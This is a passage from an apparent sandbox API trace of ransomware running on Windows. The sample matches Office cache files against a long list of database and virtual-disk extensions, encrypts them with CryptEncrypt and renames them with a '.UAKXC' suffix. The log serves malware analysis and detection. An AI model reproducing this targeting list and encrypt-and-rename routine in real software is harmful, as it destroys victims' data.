Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0161.722] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0161.723] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0161.724] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0161.725] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0161.729] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0161.729] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0161.729] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0161.729] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0161.729] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0161.730] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0161.731] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0161.732] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0161.733] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0161.733] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.733] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0161.804] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0161.804] SetEndOfFile (hFile=0x6cc) returned 1 [0161.804] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.804] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x7c4, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x7c4, lpOverlapped=0x0) returned 1 [0161.804] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.804] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x7c4, lpOverlapped=0x0) returned 1 [0161.804] CloseHandle (hObject=0x6cc) returned 1 [0161.805] GetProcessHeap () returned 0xea0000 [0161.805] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77970d0 [0161.805] lstrcpyW (in: lpString1=0x77970d0, lpString2="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" [0161.805] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0161.805] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0161.806] GetProcessHeap () returned 0xea0000 [0161.806] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77970d0 | out: hHeap=0xea0000) returned 1 [0161.806] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef65e0 | out: hHeap=0xea0000) returned 1 [0161.806] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6cb8 | out: hHeap=0xea0000) returned 1 [0161.807] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0161.807] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0161.807] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0161.808] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0161.809] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0161.809] GetLastError () returned 0x0 [0161.809] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=1452) returned 1 [0161.809] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".4dd") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".4dl") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accdb") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".accdc") returned 0x0 [0161.810] StrStrIW (lpFirst="C:\\MSOCache\\All 